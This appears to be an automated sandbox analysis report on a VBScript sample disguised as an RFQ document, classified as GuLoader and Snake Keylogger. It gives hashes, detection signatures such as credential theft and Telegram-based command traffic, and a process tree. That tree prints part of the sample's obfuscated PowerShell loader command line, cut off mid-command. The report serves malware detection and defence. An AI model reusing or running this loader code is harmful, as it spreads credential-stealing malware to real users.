Edit tour
Windows
Analysis Report
#U8a62#U50f9 (RFQ) -RFQ20241010.vbs
Overview
General Information
| Sample name: | #U8a62#U50f9 (RFQ) -RFQ20241010.vbsrenamed because original name is a hash value |
| Original sample name: | (RFQ) -RFQ20241010.vbs |
| Analysis ID: | 1530594 |
| MD5: | 1720cb49814844901b663405cb868b7d |
| SHA1: | fcc41b466e5f919f302ab92bf5305b7ee3cce8b6 |
| SHA256: | 45395d14e4f88f3cdda6fef5f6c62c885faa538cf6c057fd4ac5de8ba876b706 |
| Tags: | vbsuser-abuse_ch |
| Infos: |   |
 | |
Detection
GuLoader, Snake Keylogger
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Early bird code injection technique detected
Found malware configuration
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Snake Keylogger
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
wscript.exe (PID: 7436 cmdline: C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\#U8a6 2#U50f9 (R FQ) -RFQ20 241010.vbs " MD5: A47CBE969EA935BDD3AB568BB126BC80) 
powershell.exe (PID: 7620 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" " <#Fllesb oet Ramsho rns Rhinar ia Overdre sses Facet terende #> ;$Overophe dendes='st rudsfjeren es';<#Nonn eordenen O verspndtes brisantgr anaters Ga lactosuria Badestran de Tagdkni ngen #>;$P rambelet19 =$Forngter nes+$host. UI;If ($Pr ambelet19) {$Svinebs tets++;}fu nction Hjl peprster($ Forecastor s){$Dihydr oxy95=$Bar berfish+$F orecastors .'Length'- $Svinebste ts; for( $ Vandplante s24=5;$Van dplantes24 -lt $Dihy droxy95;$V andplantes 24+=6){$Ti llamook='O dorlessnes s';$Chairw ay+=$Forec astors[$Va ndplantes2 4];$Dispat ch48='Kniv blade';}$C hairway;}f unction Sn oose($Spek trenes){ & ($Tvil lingsstren e) ($Spekt renes);}$W eakly=Hjlp eprster 'T umbMTownl oferiezKru biiInterlU nwellFriha aergat/Cor nu5Dimho.F enyl0Drivt Bedri( O teWUnderi urinFe ied SubdoE,si swCont sUr b n Hi.hfN LuxuTvest , Bomba1Fl les0C,clo. Bef e0V vo b;Kvste Te stWRadagiT oernnStvfn 6 albi4 ot r; N,ds Ti nktxSousa6 Bylde4Reip ;Vre,s Au tovrM riov Pendu:.res a1Phono2Da iry1 List. Duru0Di p l)Stat Tra ,eGMicroeP lac cPopul kOversoa.k om/Evasi2O ctan0 Anti 1 Ital0Ret st0Vel.e1T .ger0Am ro 1Intr tot aF prioiJa ,thrLoinse D,rifForm aoThe,oxBr u,a/ ,ars1 La it2 Uva ,1Etage. n suf0Noni ' ;$Erythroc ytes=Hjlpe prster ' h yp uBilm.s UdaaneOcta .r dbyg-As sesARapseG Grunde egl in GoattLe che ';$Beh aviourist= Hjlpeprste r 'ArchehS trant Lder tHollop Ak sis .imm:r esgs/Wi te /Frekvd Dr g r InviiH ov dvKlost eMrkel.Phi lagFallioC ystooBudli g Fa.slSup .reLidel.f riticDenta oPro,rmSan da/UnderuA arspcExtra ?Eftere Ge n.xUdsulpO eje oCl.ir rDesigtSyd ga=RednidS ita oKondi w aragn ul nelProgro dungaSupra d Deno&Ano pliEmbusdP lak =Terre 1AfvanvHon eymMagikFo vertR Seto 9KadenyKva ded U dyuC ecilHDisco 7.kopuBFr, sk2Sa.rulT rib.OU.tag F Pro ODra ugQ apsoq PochcSo nk ZIna,nV Al peCSgekoVH ybriG ind4 Ekspw.ilh acGrundtls erkOEu ukC rhipibSlde cIOver ';$ Brkop=Hjlp eprster 'F leck>delin ';$Tvilli ngsstrene= Hjlpeprste r 'Lith IN oncoeF emm x unds ';$ Eaters='Fr og';$Uptor e='\Komman docentrale ns.Qua';Sn oose (Hjlp eprster 'g aase$Undfa g BibrLFlo kdoMi libL sgreAAmo e ladstr: ft rdHdowntiE jnerLdrive dAcy aeHep tdSte neS ulp.=Rigou $Jettee Tr otN nscrvP efe:Polyc A RepoPPro caP UnindS elv aMajbr tNonmiARep la+B.nga$A ldisu.agsk PCol.qT Be fiOUnre RP ,enoeSubhe ');Snoose (Hjlpeprs ter ',uftn $DenatGOut smL Misto Sk lb Aft aPretrLfl. vv:S.imeLN iel Sboppe BGran LCom praUnde D Biote.elev 2Detin5 Sk l4Y.erl=S abba$Prede BAtta eGar niHB omaAB or eV Smok IQuibbOKom mauIntuiRR apheIO sti SBilfoTAar so.ReindsO pretpA,mit lTa kei ,i batHulsv(D ocog$ Plac BCapitRpul ldksapphoS kralPBasil ) olyt '); Snoose (Hj